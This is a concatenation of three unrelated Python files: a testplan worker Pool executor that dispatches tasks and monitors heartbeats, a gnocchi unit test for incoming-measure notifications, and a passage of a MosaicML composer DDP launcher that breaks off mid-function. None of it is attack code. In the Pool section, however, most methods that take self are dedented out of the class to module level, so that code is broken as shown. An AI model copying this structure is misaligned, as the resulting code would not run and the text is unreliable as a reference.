            # Heartbeat period in seconds; None disables heartbeat monitoring.
            ConfigOption("worker_heartbeat", default=None): Or(
                int, float, None
            ),
            ConfigOption("heartbeats_miss_limit", default=3): int,
            ConfigOption("restart_count", default=3): int,
            ConfigOption("max_active_loop_sleep", default=5): numbers.Number,
            ConfigOption("allow_task_rerun", default=True): bool,
        }
class Pool(Executor):
    """
    Pool task executor object that initializes workers and dispatches tasks.

    :param name: Pool name.
    :type name: ``str``
    :param size: Pool workers size. Default: 4
    :type size: ``int``
    :param worker_type: Type of worker to be initialized.
    :type worker_type: :py:class:`~testplan.runners.pools.base.Worker`
    :param worker_heartbeat: Worker heartbeat period.
    :type worker_heartbeat: ``int`` or ``float`` or ``NoneType``
    :param heartbeats_miss_limit: Maximum times a heartbeat is missed.
    :type heartbeats_miss_limit: ``int``
    :param restart_count: How many times a worker in pool can be restarted.
    :type restart_count: ``int``
    :param max_active_loop_sleep: Maximum value for delay logic in active sleep.
    :type max_active_loop_sleep: ``int`` or ``float``
    :param allow_task_rerun: Whether allow task to rerun when executing in this pool
    :type allow_task_rerun: ``bool``

    Also inherits all :py:class:`~testplan.runners.base.Executor` options.
    """

    CONFIG = PoolConfig
    CONN_MANAGER = QueueServer

    def __init__(
        self,
        name,
        size=4,
        worker_type=Worker,
        worker_heartbeat=None,
        heartbeats_miss_limit=3,
        restart_count=3,
        max_active_loop_sleep=5,
        allow_task_rerun=True,
        **options
    ):
        # Fold the explicit keyword arguments into the options dict consumed
        # by the config machinery of the Executor base.
        options.update(self.filter_locals(locals()))
        super(Pool, self).__init__(**options)
        self.unassigned = queue.PriorityQueue()  # unassigned tasks
        self._executed_tests = []
        self._task_retries_cnt = {}  # uid: times_reassigned_without_result
        self._task_retries_limit = 2
        self._workers = entity.Environment(parent=self)
        self._workers_last_result = {}
        self._conn = self.CONN_MANAGER()
        self._conn.parent = self
        self._pool_lock = threading.Lock()
        self._metadata = None
        # Set when Pool is started.
        self._exit_loop = False
        self._start_monitor_thread = True
        # Methods for handling different Message types. These are expected to
        # take the worker, request and response objects as the only required
        # positional args.
        self._request_handlers = {
            Message.ConfigRequest: self._handle_cfg_request,
            Message.TaskPullRequest: self._handle_taskpull_request,
            Message.TaskResults: self._handle_taskresults,
            Message.Heartbeat: self._handle_heartbeat,
            Message.SetupFailed: self._handle_setupfailed,
        }
def uid(self):
    """Pool name."""
    return self.cfg.name

def add(self, task, uid):
    """
    Add a task for execution.

    :param task: Task to be scheduled to workers.
    :type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
    :param uid: Task uid.
    :type uid: ``str``
    :raises ValueError: if ``task`` is not a ``Task`` instance.
    """
    if not isinstance(task, Task):
        raise ValueError(
            "Task was expected, got {} instead.".format(type(task))
        )
    super(Pool, self).add(task, uid)
    # Priority queue: tasks with a lower priority value are pulled first.
    self.unassigned.put((task.priority, uid))
    self._task_retries_cnt[uid] = 0
def _can_assign_task(self, task):
    """
    Is this pool able to execute the task.

    The base implementation accepts every task; override to restrict.

    :param task: Task to be scheduled to pool.
    :type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
    :return: True if can assign task to pool, otherwise False
    :rtype: ``bool``
    """
    return True

def _can_assign_task_to_worker(self, task, worker):
    """
    When a worker requests a task, it is necessary to verify that
    the worker is suitable to execute the task.

    The base implementation lets any worker take any task; override to
    restrict.

    :param task: Task to be scheduled to worker.
    :type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
    :param worker: A worker created by pool executor.
    :type worker: :py:class:`~testplan.runners.pools.base.Worker`
    :return: True if can assign task to worker, otherwise False
    :rtype: ``bool``
    """
    return True
def _loop(self):
    """
    Main executor work loop - runs in a separate thread when the Pool is
    started.
    """
    if self._start_monitor_thread:
        self.logger.debug("Starting worker monitor thread.")
        self._worker_monitor = threading.Thread(
            target=self._workers_monitoring
        )
        self._worker_monitor.daemon = True
        self._worker_monitor.start()

    while self.active and not self._exit_loop:
        msg = self._conn.accept()
        if msg:
            try:
                self.handle_request(msg)
            except Exception:
                # Keep the loop alive - one bad request must not kill the
                # whole pool; just log the traceback and carry on.
                self.logger.error(traceback.format_exc())
        time.sleep(self.cfg.active_loop_sleep)
def handle_request(self, request):
    """
    Handles a worker request. I.e TaskPull, TaskResults, Heartbeat etc.

    Dispatches via ``self._request_handlers``; unknown commands and handler
    failures are answered so the worker is never left waiting.

    :param request: Worker request.
    :type request: :py:class:`~testplan.runners.pools.communication.Message`
    """
    sender_index = request.sender_metadata["index"]
    worker = self._workers[sender_index]

    self.logger.debug(
        "Pool %s received message from worker %s - %s, %s",
        self.cfg.name,
        worker,
        request.cmd,
        request.data,
    )

    if not worker.active:
        # Message is still processed below; log so late/stale worker
        # traffic remains traceable.
        self.logger.warning(
            "Message from inactive worker %s - %s, %s",
            worker,
            request.cmd,
            request.data,
        )

    response = Message(**self._metadata)

    if not self.active or self.status.tag == self.STATUS.STOPPING:
        worker.respond(response.make(Message.Stop))
    elif request.cmd in self._request_handlers:
        try:
            self._request_handlers[request.cmd](worker, request, response)
        except Exception:
            self.logger.error(traceback.format_exc())
            self.logger.debug(
                "Not able to handle request from worker, sending Stop cmd"
            )
            worker.respond(response.make(Message.Stop))
    else:
        self.logger.error(
            "Unknown request: {} {} {} {}".format(
                request, dir(request), request.cmd, request.data
            )
        )
        worker.respond(response.make(Message.Ack))
def _handle_cfg_request(self, worker, _, response):
    """Handle a ConfigRequest from a worker.

    Walks the config chain from this pool up to the root and ships the
    denormalized form of every level so the worker can rebuild it.
    """
    chain = []
    node = self.cfg
    while node:
        chain.append(node.denormalize())
        node = node.parent
    worker.respond(response.make(Message.ConfigSending, data=chain))
def _handle_taskpull_request(self, worker, request, response):
    """Handle a TaskPullRequest from a worker.

    ``request.data`` is the number of tasks the worker asks for.  Sends a
    TaskSending with whatever could be assigned, otherwise an Ack.
    """
    tasks = []

    if self.status.tag == self.status.STARTED:
        for _ in range(request.data):
            try:
                priority, uid = self.unassigned.get_nowait()
            except queue.Empty:
                break

            task = self._input[uid]
            if self._can_assign_task(task):
                if self._task_retries_cnt[uid] > self._task_retries_limit:
                    self._discard_task(
                        uid,
                        "{} already reached max retries limit: {}".format(
                            self._input[uid], self._task_retries_limit
                        ),
                    )
                    continue
                else:
                    if self._can_assign_task_to_worker(task, worker):
                        self.logger.test_info(
                            "Scheduling {} to {}{}".format(
                                task,
                                worker,
                                " (rerun {})".format(task.reassign_cnt)
                                if task.reassign_cnt > 0
                                else "",
                            )
                        )
                        worker.assigned.add(uid)
                        tasks.append(task)
                        # Record which executor/worker ran this task.
                        task.executors.setdefault(self.cfg.name, set())
                        task.executors[self.cfg.name].add(worker.uid())
                        self.record_execution(uid)
                    else:
                        self.logger.test_info(
                            "Cannot schedule {} to {}".format(task, worker)
                        )
                        # Requeue; counted as a retry so the task cannot
                        # bounce between unsuitable workers forever.
                        self.unassigned.put((task.priority, uid))
                        self._task_retries_cnt[uid] += 1
            else:
                # Later may create a default local pool as failover option
                self._discard_task(
                    uid,
                    "{} cannot be executed in {}".format(
                        self._input[uid], self
                    ),
                )

        if tasks:
            worker.respond(response.make(Message.TaskSending, data=tasks))
            # Remember how many requested slots remain unfilled.
            worker.requesting = request.data - len(tasks)
            return

    worker.requesting = request.data
    worker.respond(response.make(Message.Ack))
def _handle_taskresults(self, worker, request, response):
    """Handle a TaskResults message from a worker."""

    def task_should_rerun():
        # Closure over ``task_result``/``uid`` of the loop below: decide
        # whether the just-finished task must be scheduled once more.
        if not self.cfg.allow_task_rerun:
            return False
        if not task_result.task:
            return False
        if task_result.task.rerun == 0:
            return False

        result = task_result.result
        if (
            task_result.status
            and result
            and result.run
            and result.report.passed
        ):
            # Executed successfully and passed - no reason to rerun.
            return False

        if task_result.task.reassign_cnt >= task_result.task.rerun:
            self.logger.test_info(
                "Will not rerun %(input)s again as it already "
                "reached max rerun limit %(reruns)d",
                {
                    "input": self._input[uid],
                    "reruns": task_result.task.rerun,
                },
            )
            return False

        return True

    # Ack first so the worker is not blocked while results are processed.
    worker.respond(response.make(Message.Ack))
    for task_result in request.data:
        uid = task_result.task.uid()
        worker.assigned.remove(uid)
        self._workers_last_result.setdefault(worker, time.time())
        self.logger.test_info(
            "De-assign {} from {}".format(task_result.task, worker)
        )

        if task_should_rerun():
            self.logger.test_info(
                "Will rerun %(task)s for max %(rerun)d more times",
                {
                    "task": task_result.task,
                    "rerun": task_result.task.rerun
                    - task_result.task.reassign_cnt,
                },
            )
            self.unassigned.put((task_result.task.priority, uid))
            self._task_retries_cnt[uid] = 0
            self._input[uid].reassign_cnt += 1
            # Will rerun task, but still need to retain the result
            self._append_temporary_task_result(task_result)
            continue

        self._print_test_result(task_result)
        self._results[uid] = task_result
        self.ongoing.remove(uid)
def _handle_heartbeat(self, worker, request, response):
    """Record a worker heartbeat and acknowledge it with the receive time."""
    received_at = time.time()
    worker.last_heartbeat = received_at
    delay = time.time() - request.data
    self.logger.debug(
        "Received heartbeat from {} at {} after {}s.".format(
            worker, request.data, delay
        )
    )
    worker.respond(response.make(Message.Ack, data=received_at))
def _handle_setupfailed(self, worker, request, response):
    """Log a worker's setup failure, ack the message, then decommission it."""
    failure_details = request.data
    self.logger.test_info(
        "Worker {} setup failed:{}{}".format(
            worker, os.linesep, failure_details
        )
    )
    worker.respond(response.make(Message.Ack))
    self._decommission_worker(worker, "Aborting {}, setup failed.")
def _decommission_worker(self, worker, message):
    """
    Decommission a worker by move all assigned task back to pool

    :param worker: the worker being taken out of service
    :param message: log template, formatted with the worker
    """
    self.logger.critical(message.format(worker))
    if os.path.exists(worker.outfile):
        self.logger.critical("\tlogfile: {}".format(worker.outfile))
    while worker.assigned:
        uid = worker.assigned.pop()
        task = self._input[uid]
        self.logger.test_info(
            "Re-collect {} from {} to {}.".format(task, worker, self)
        )
        # Requeue; counted as a retry so a flapping worker cannot recycle
        # the same task indefinitely.
        self.unassigned.put((task.priority, uid))
        self._task_retries_cnt[uid] += 1
def _workers_monitoring(self):
    """
    Worker fault tolerance logic. Check is based on:
    1) handler status
    2) heartbeat if available

    Runs in its own daemon thread (started by :py:meth:`_loop`) until the
    pool stops, aborts, or all workers become inactive.
    """
    previous_status = {"active": [], "inactive": [], "initializing": []}
    loop_interval = self.cfg.worker_heartbeat or 5  # seconds

    break_outer_loop = False
    while self.active:
        hosts_status = {"active": [], "inactive": [], "initializing": []}

        for worker in self._workers:
            status, reason = self._query_worker_status(worker)
            if status == "inactive":
                with self._pool_lock:
                    if self.active and self.status.tag not in (
                        self.status.STOPPING,
                        self.status.STOPPED,
                    ):
                        # A successful restart flips the worker back to
                        # active for this round of bookkeeping.
                        if self._handle_inactive(worker, reason):
                            status = "active"
                    else:
                        # if pool is aborting/stopping, exit monitor
                        break_outer_loop = True
                        break

            hosts_status[status].append(worker)

        if break_outer_loop:
            break

        # Only log when something actually changed since last round.
        if hosts_status != previous_status:
            self.logger.info(
                "%s Hosts status update", datetime.datetime.now()
            )
            self.logger.info(pprint.pformat(hosts_status))
            previous_status = hosts_status

        if (
            not hosts_status["active"]
            and not hosts_status["initializing"]
            and hosts_status["inactive"]
        ):
            # Nothing left that could make progress - abort the pool.
            self.logger.critical(
                "All workers of {} are inactive.".format(self)
            )
            self.abort()
            break

        try:
            # For early finish of worker monitoring thread.
            wait_until_predicate(
                lambda: not self.is_alive,
                timeout=loop_interval,
                interval=0.05,
            )
        except RuntimeError:
            break
def _query_worker_status(self, worker):
    """
    Query the current status of a worker. If heartbeat monitoring is
    enabled, check the last heartbeat time is within threshold.

    :param worker: Pool worker to query
    :return: worker status string - one of 'initializing', 'inactive' or
        'active', and an optional reason string
    """
    if not worker.active or worker.status.tag in (
        worker.status.STOPPING,
        worker.status.STOPPED,
    ):
        return "inactive", "Worker {} in stop/abort status"

    if worker.status.tag in (worker.status.NONE, worker.status.STARTING):
        return "initializing", None

    # else: worker must be in state STARTED
    if worker.status.tag != worker.status.STARTED:
        raise RuntimeError(
            "Worker in unexpected state {}".format(worker.status.tag)
        )

    if not worker.is_alive:  # handler based monitoring
        return (
            "inactive",
            "Decommission {}, handler no longer alive".format(worker),
        )

    # If no heartbeat is configured, we treat the worker as "active"
    # since it is in state STARTED and its handler is alive.
    if not self.cfg.worker_heartbeat:
        return "active", None

    # else: do heartbeat based monitoring
    if worker.last_heartbeat is None:
        # Bug fix: a STARTED worker that has not yet sent its first
        # heartbeat used to crash the monitor with a TypeError
        # (``time.time() - None``). Start the clock now instead; the
        # miss limit applies from this point on.
        worker.last_heartbeat = time.time()
        return "active", None

    lag = time.time() - worker.last_heartbeat
    if lag > self.cfg.worker_heartbeat * self.cfg.heartbeats_miss_limit:
        return (
            "inactive",
            "Has not been receiving heartbeat from {} for {} "
            "sec".format(worker, lag),
        )

    return "active", None
def _handle_inactive(self, worker, reason):
    """
    Handle an inactive worker.

    :param worker: worker object
    :type worker: :py:class:`~testplan.runners.pool.base.Worker`
    :param reason: why worker is considered inactive
    :type reason: ``str``
    :return: True if worker restarted, else False
    :rtype: ``bool``
    """
    if worker.status.tag != worker.status.STARTED:
        return False

    self._decommission_worker(worker, reason)

    if not worker.restart_count:
        # Restart budget exhausted - give up on this worker entirely.
        worker.abort()
        return False

    worker.restart_count -= 1
    try:
        worker.restart()
    except Exception as exc:
        self.logger.critical(
            "Worker {} failed to restart: {}".format(worker, exc)
        )
        return False
    return True
def _discard_task(self, uid, reason):
    """Mark task *uid* as failed with *reason* and drop it from execution."""
    task = self._input[uid]
    self.logger.critical(
        "Discard task {} of {} - {}.".format(task, self, reason)
    )
    self._results[uid] = TaskResult(
        task=task,
        status=False,
        reason="Task discarded by {} - {}.".format(self, reason),
    )
    self.ongoing.remove(uid)
def _discard_pending_tasks(self):
    """Fail every still-ongoing task because the pool is going away."""
    self.logger.critical("Discard pending tasks of {}.".format(self))
    while self.ongoing:
        uid = self.ongoing.pop(0)
        task = self._input[uid]
        self._results[uid] = TaskResult(
            task=task,
            status=False,
            reason="Task [{}] discarding due to {} abort.".format(
                task._target, self
            ),
        )
def _append_temporary_task_result(self, task_result):
    """If a task should rerun, append the task result already fetched."""
    test_report = task_result.result.report
    uid = task_result.task.uid()
    if uid not in self._task_retries_cnt:
        return

    # Rename report name/uid so the intermediate run is distinguishable
    # from the final one in the overall report.
    postfix = " => Run {}".format(task_result.task.reassign_cnt)
    test_report.name = "{}{}".format(test_report.name, postfix)
    test_report.uid = "{}{}".format(test_report.uid, postfix)
    test_report.category = ReportCategories.TASK_RERUN
    # NOTE(review): "xfail" override presumably keeps a failing
    # intermediate run from failing the plan - confirm with report logic.
    test_report.status_override = "xfail"
    new_uuid = strings.uuid4()
    self._results[new_uuid] = task_result
    self.parent._tests[new_uuid] = self.cfg.name
    self.record_execution(new_uuid)
def _print_test_result(self, task_result):
    """Log the top-level pass/fail status of a finished task, if it has one."""
    result = task_result.result
    # Only runnable results that carry a report can be summarised.
    if not (
        isinstance(result, entity.RunnableResult)
        and hasattr(result, "report")
    ):
        return

    # Currently prints report top level result and not details.
    report = result.report
    self.logger.log_test_status(report.name, report.status)
def _add_workers(self):
    """Create ``cfg.size`` workers, parent them to this pool and register them."""
    for i in range(self.cfg.size):
        uid = str(i)
        worker = self.cfg.worker_type(
            index=uid,
            restart_count=self.cfg.restart_count,
            active_loop_sleep=0.01,
        )
        worker.parent = self
        worker.cfg.parent = self.cfg
        self._workers.add(worker, uid=uid)
        self.logger.debug(
            "Added worker %(index)s (outfile = %(outfile)s)",
            {"index": uid, "outfile": worker.outfile},
        )
def _start_workers(self):
    """Start all workers of the pool"""
    for worker in self._workers:
        # Register each worker's transport with the connection manager
        # before starting the environment.
        self._conn.register(worker)
    self._workers.start()

def starting(self):
    """Starting the pool and workers."""
    # TODO do we need a lock here?
    self.make_runpath_dirs()
    if self.runpath is None:
        raise RuntimeError("runpath was not set correctly")
    self._metadata = {"runpath": self.runpath}

    self._conn.start()

    for worker in self._workers:
        # reset worker (if any) status
        worker.status.change(ResourceStatus.STARTING)

    self._exit_loop = False
    super(Pool, self).starting()  # start the loop & monitor

    if not self._workers:
        self._add_workers()
    self._start_workers()

    if self._workers.start_exceptions:
        for msg in self._workers.start_exceptions.values():
            self.logger.error(msg)
        self.abort()
        raise RuntimeError(
            "All workers of {} failed to start.".format(self)
        )

    self.status.change(self.status.STARTED)
    self.logger.debug("%s started.", self.__class__.__name__)
def workers_requests(self):
    """Count how many tasks workers are requesting."""
    total = 0
    for worker in self._workers:
        total += worker.requesting
    return total
def _stop_workers(self):
    """Stop the worker environment."""
    self._workers.stop()

def stopping(self):
    """Stop connections and workers."""
    # Hold the pool lock so the monitor thread cannot race worker
    # decommissioning while things are being torn down.
    with self._pool_lock:
        self._stop_workers()
        for worker in self._workers:
            worker.transport.disconnect()

    self._exit_loop = True
    super(Pool, self).stopping()  # stop the loop and the monitor

    self._conn.stop()
    self.status.change(self.status.STOPPED)
    self.logger.debug("Stopped %s", self.__class__.__name__)
def abort_dependencies(self):
    """Empty generator to override parent implementation."""
    # ``return`` before ``yield`` makes this a generator function that
    # yields nothing: the pool declares no abort dependencies.
    return
    yield

def aborting(self):
    """Aborting logic."""
    self.logger.debug("Aborting pool {}".format(self))

    for worker in self._workers:
        worker.abort()

    super(Pool, self).stopping()  # stop the loop and the monitor
    self._conn.abort()
    self._discard_pending_tasks()

    self.logger.debug("Aborted pool {}".format(self))

def record_execution(self, uid):
    # Remember that *uid* was scheduled for execution in this pool.
    self._executed_tests.append(uid)
|
test_incoming.py | # -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import uuid
import numpy
from gnocchi import incoming
from gnocchi import indexer
from gnocchi.tests import base as tests_base
class TestIncomingDriver(tests_base.TestCase):
    def setUp(self):
        super(TestIncomingDriver, self).setUp()
        # A lot of tests wants a metric, create one
        self.metric = indexer.Metric(
            uuid.uuid4(),
            self.archive_policies["low"])

    def test_iter_on_sacks_to_process(self):
        """Check that writing measures eventually notifies the sack iterator."""
        # Skip drivers that only inherit the default (unimplemented) method.
        if (self.incoming.iter_on_sacks_to_process ==
                incoming.IncomingDriver.iter_on_sacks_to_process):
            self.skipTest("Incoming driver does not implement "
                          "iter_on_sacks_to_process")

        found = threading.Event()
        sack_to_find = self.incoming.sack_for_metric(self.metric.id)

        def _iter_on_sacks_to_process():
            # Background consumer: set the event once our sack shows up.
            for sack in self.incoming.iter_on_sacks_to_process():
                self.assertIsInstance(sack, incoming.Sack)
                if sack == sack_to_find:
                    found.set()
                    break

        finder = threading.Thread(target=_iter_on_sacks_to_process)
        finder.daemon = True
        finder.start()

        # Try for 30s to get a notification about this sack
        for _ in range(30):
            if found.wait(timeout=1):
                break
            # NOTE(jd) Retry to send measures. It cannot be done only once as
            # there might be a race condition between the threads
            self.incoming.finish_sack_processing(sack_to_find)
            self.incoming.add_measures(self.metric.id, [
                incoming.Measure(numpy.datetime64("2014-01-01 12:00:01"), 69),
            ])
        else:
            # for/else: only reached when the loop completed without break,
            # i.e. no notification arrived within ~30 seconds.
            self.fail("Notification for metric not received")
|
ddp.py | # Copyright 2021 MosaicML. All Rights Reserved.
from __future__ import annotations
import collections.abc
import datetime
import logging
import os
import signal
import subprocess
import sys
import tempfile
import time
import warnings
from abc import ABC, abstractmethod
from contextlib import contextmanager, nullcontext
from dataclasses import dataclass
from threading import Thread
from typing import Callable, ContextManager, Iterator, List, Optional, Sequence, Set, TypeVar, Union, cast
import torch
import torch.distributed
import torch.utils.data
import yahp as hp
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from composer.core.state import State
from composer.core.types import Batch, DataLoader, Model, Tensor
from composer.datasets import DataloaderHparams, DataloaderSpec, WrappedDataLoader
from composer.utils.iter_helpers import ensure_tuple
from composer.utils.string_enum import StringEnum
logger = logging.getLogger(__name__)
TObj = TypeVar("TObj")
CLEANUP_TIMEOUT = datetime.timedelta(seconds=5)
class DataloaderMultipleIterationWarning(Warning):
    """Issued when a new iteration of a DDP dataloader starts before the
    previous iteration has finished."""
    pass
class DDPDataLoader(WrappedDataLoader):
    """Ensure sampler.set_epoch() is called after each iteration.

    DDPDataLoader wraps a dataloader and a distributed sampler and is
    called after each iteration (epoch) through the dataset.
    See: https://pytorch.org/docs/stable/data.html#torch.utils.data.distributed.DistributedSampler
    """

    def __init__(self, dataloader: DataLoader) -> None:
        super().__init__(dataloader)
        if not isinstance(self.dataloader.sampler, DistributedSampler):
            raise ValueError("When using the DDP data loader, the sampler must be a DistributedSampler")
        self._iterator: Optional[Iterator[Batch]] = None

    def _advance_epoch(self) -> None:
        # Bump the distributed sampler so the next pass reshuffles
        # consistently across ranks.
        assert isinstance(self.sampler, DistributedSampler)
        self.sampler.set_epoch(epoch=self.sampler.epoch + 1)

    def __iter__(self) -> DDPDataLoader:
        if self._iterator is not None:
            # A previous iteration is still open: warn, then skip ahead to
            # the next epoch before handing out a fresh iterator.
            warnings.warn(
                "The dataloader detected the start of a new iteration before the previous iteration finished. "
                "The dataloader is skipping ahead to the start of the next epoch. "
                "Multiple simultaneous iterations through the DDP dataloader prohibited, since "
                "it automatically tracks the current epoch.",
                category=DataloaderMultipleIterationWarning)
            self._advance_epoch()
        self._iterator = iter(self.dataloader)
        return self

    def __next__(self) -> Batch:
        assert self._iterator is not None
        try:
            return next(self._iterator)
        except StopIteration:
            # Epoch exhausted: advance the sampler, then re-raise so the
            # caller's loop terminates normally.
            self._iterator = None
            self._advance_epoch()
            raise
class DDPSyncStrategy(StringEnum):
    """How and when DDP gradient synchronization should happen.

    Attributes:
        SINGLE_AUTO_SYNC: The default behavior for DDP. Gradients are synchronized as they are
            computed, for only the final microbatch of a batch. This is the most efficient
            strategy, but can lead to errors when ``find_unused_parameters`` is set, since
            it is possible different microbatches may use different sets of parameters,
            leading to an incomplete sync.
        MULTI_AUTO_SYNC: The default behavior for DDP when ``find_unused_parameters`` is set.
            Gradients are synchronized as they are computed for all microbatches. This ensures
            complete synchronization, but is less efficient than :attr:`SINGLE_AUTO_SYNC`. This
            efficiency gap is usually small, as long as either DDP syncs are a small portion
            of the trainer's overall runtime, or the number of microbatches per batch is
            relatively small.
        FORCED_SYNC: Gradients are manually synchronized only after all gradients have been
            computed for the final microbatch of a batch. Like :attr:`MULTI_AUTO_SYNC`, this
            strategy ensures complete gradient synchronization, but this tends to be slower than
            :attr:`MULTI_AUTO_SYNC`. This is because ordinarily syncs can happen in parallel
            with the ``loss.backward()`` computation, meaning syncs can be mostly complete by
            the time that function finishes. However, in certain circumstances, syncs may take
            a very long time to complete - if there are also a lot of microbatches per batch,
            this strategy may be optimal.
    """
    SINGLE_AUTO_SYNC = "single_auto_sync"
    MULTI_AUTO_SYNC = "multi_auto_sync"
    FORCED_SYNC = "forced_sync"
class DDP:
    """Orchestrates distributed data-parallel training.

    Responsibilities:

    * Launching one worker process per local device (:meth:`launch`), either by
      forking rank 0 or reusing the current process for it.
    * Initializing and tearing down ``torch.distributed`` (:meth:`launch` /
      :meth:`cleanup`).
    * Collective helpers (:meth:`barrier`, :meth:`all_reduce`, :meth:`all_gather`,
      :meth:`all_gather_object`) that fall back to single-process behavior when
      ``torch.distributed`` is unavailable.
    * Wrapping the model (:meth:`prepare_module`) and dataloader
      (:meth:`create_dataloader`) for DDP, and controlling gradient-sync timing
      (:meth:`ddp_sync_context`).
    """

    def __init__(self,
                 *,
                 nproc_per_node: int,
                 store_hparams: StoreHparams,
                 node_rank: int,
                 num_nodes: int,
                 backend: str,
                 fork_rank_0: bool,
                 timeout: float = 5,
                 find_unused_parameters: bool = False,
                 ddp_sync_strategy: Optional[Union[str, DDPSyncStrategy]] = None):
        self.hparams = DDPHparams(
            store=store_hparams,
            node_rank=node_rank,
            num_nodes=num_nodes,
            fork_rank_0=fork_rank_0,
            timeout=timeout,
        )
        self.nproc_per_node = nproc_per_node
        self.backend = backend
        self.processes: List[subprocess.Popen[str]] = []
        # Pids we killed on purpose, so monitor() does not treat their nonzero
        # exit codes as crashes.
        self.killed_pids: Set[int] = set()
        self.find_unused_parameters = find_unused_parameters
        if ddp_sync_strategy is None:
            # When parameters may be unused, only a forced sync guarantees every
            # gradient gets reduced; otherwise the cheap single auto-sync suffices.
            self.ddp_sync_strategy = DDPSyncStrategy.SINGLE_AUTO_SYNC if not find_unused_parameters else DDPSyncStrategy.FORCED_SYNC
        else:
            self.ddp_sync_strategy = DDPSyncStrategy(ddp_sync_strategy)
        if backend == 'nccl':
            # Validate GPU availability eagerly so misconfiguration fails here,
            # not deep inside init_process_group.
            if not torch.cuda.is_available():
                raise ValueError('CUDA not available but gpu backend requested.')
            if torch.cuda.device_count() < nproc_per_node:
                raise ValueError(f'Requested {nproc_per_node} GPUs, but '\
                                 f'only {torch.cuda.device_count()} available.')
            if not torch.distributed.is_nccl_available():
                raise ValueError('Requested NCCL backend not available in torch.distributed')

    @property
    def world_size(self) -> int:
        """Total number of training processes across all nodes."""
        return self.hparams.num_nodes * self.nproc_per_node

    def barrier(self) -> None:
        """Synchronize all ranks; silently a no-op without torch.distributed."""
        if torch.distributed.is_available():
            torch.distributed.barrier()
        # If not on DDP, then do nothing

    def all_reduce(
        self,
        tensor: torch.Tensor,
        reduce_operation: str = "SUM",
    ) -> None:
        """All-reduce ``tensor`` in place across all ranks.

        Args:
            tensor (torch.Tensor): tensor to reduce; overwritten with the result.
            reduce_operation (str): name of a ``torch.distributed.ReduceOp``
                member (case-insensitive), e.g. ``"SUM"``.

        Raises:
            NotImplementedError: if torch.distributed is unavailable.
        """
        if torch.distributed.is_available():
            reduce_op = getattr(torch.distributed.ReduceOp, reduce_operation.upper())
            torch.distributed.all_reduce(tensor, op=reduce_op)
        else:
            raise NotImplementedError("Non-DDP versions of reduce operations are not yet implemented")

    def all_gather(self, tensor: torch.Tensor) -> Sequence[Tensor]:
        """gather_to_rank_zero collects a tensor from each rank, and returns a sequence of tensors indexed by rank

        Args:
            tensor (torch.Tensor): tensor from each rank to be gathered

        Returns:
            Sequence[Tensor]: A sequence of tensors indexed by rank
        """
        if torch.distributed.is_available():
            obj_gather_list = [torch.zeros_like(tensor) for _ in range(self.world_size)]
            torch.distributed.all_gather(obj_gather_list, tensor)
            return obj_gather_list
        else:
            # Single-process fallback: the only "rank" is this one.
            return [tensor]

    def all_gather_object(self, obj: TObj) -> List[TObj]:
        """gather_object_to_rank_zero collects a pickleable object from each rank, and returns a list of
        these objects indexed by rank

        Args:
            obj (TObj): Object to be gathered

        Returns:
            List[TObj]: A list of objects indexed by rank
        """
        if torch.distributed.is_available():
            obj_gather_list = [None for _ in range(self.world_size)]
            torch.distributed.all_gather_object(obj_gather_list, obj)
            # torch.distributed will replace the None's in obj_gather_list with the gathered objects on rank 0
            # or will just be None on non-rank-0
            return cast(List[TObj], obj_gather_list)
        else:
            return [obj]

    def launch(self, state: State, loop: Callable[[], None]):
        """Spawn per-rank workers if needed, initialize the process group, run
        ``loop()``, and always clean up afterwards.

        Args:
            state (State): training state, consulted for rank bookkeeping sanity checks.
            loop (Callable[[], None]): the training entry point to run on this rank.
        """
        if os.environ.get("RANK") is None:
            # RANK unset means we are the launcher, not an already-spawned worker.
            os.environ["WORLD_SIZE"] = str(self.world_size)
            logger.info("Starting DDP on node_rank(%d) with world_size(%d)", self.hparams.node_rank, self.world_size)
            if torch.distributed.is_available():
                # Adapted from torch.distributed.launch
                # set PyTorch distributed related environmental variables
                current_env = os.environ.copy()
                # TODO omp num threads -- this parameter needs to be auto-tuned
                for local_rank in range(self.nproc_per_node):
                    # each process's rank
                    global_rank = self.nproc_per_node * self.hparams.node_rank + local_rank
                    current_env["RANK"] = str(global_rank)
                    if local_rank == 0 and not self.hparams.fork_rank_0:
                        # Reuse the current process as local rank 0.
                        os.environ["RANK"] = str(global_rank)
                    else:
                        logger.info("Launching process for global_rank(%d) on node_rank(%d)", global_rank,
                                    self.hparams.node_rank)
                        # spawn the processes (re-running this same script)
                        cmd = [
                            sys.executable,
                            "-u",
                            *sys.argv,
                        ]
                        if local_rank == 0:
                            # Attaching rank 0 to the main stdout/stderr so interactive
                            # terminal output will work without issue (e.g. tqdm)
                            process = subprocess.Popen(cmd, env=current_env, text=True)
                        else:
                            # Other processes, except in the case of an error, should not print anything
                            # NOTE(review): with file objects passed here, Popen.stdout/.stderr
                            # stay None, so monitor() cannot recover this output on failure --
                            # confirm whether PIPE (with draining) was intended.
                            process = subprocess.Popen(
                                cmd,
                                env=current_env,
                                stdout=tempfile.TemporaryFile(),
                                stderr=tempfile.TemporaryFile(),
                                text=True,
                            )
                        self.processes.append(process)
                if self.hparams.fork_rank_0:
                    # The launcher only supervises its children; it never trains.
                    self.monitor()
                    return
                else:
                    Thread(target=self.monitor, daemon=True).start()
            else:
                if self.world_size != 1:
                    raise ValueError("Must have world size == 1 when torch.distributed is not available")
                if self.hparams.node_rank != 0:
                    raise ValueError("Must have a node_rank == 0 when torch.distributed is not available")
                os.environ["RANK"] = "0"
        # We are now on the correct process
        global_rank = int(os.environ["RANK"])
        # Fixed: the node that owns a global rank is rank // nproc_per_node.
        # The previous check divided by world_size, which only held on node 0.
        assert global_rank // self.nproc_per_node == self.hparams.node_rank
        assert os.environ["WORLD_SIZE"] == str(
            self.world_size
        ), f"os.environ['WORLD_SIZE']({os.environ['WORLD_SIZE']}) != self.world_size({self.world_size})"
        is_main = global_rank == 0
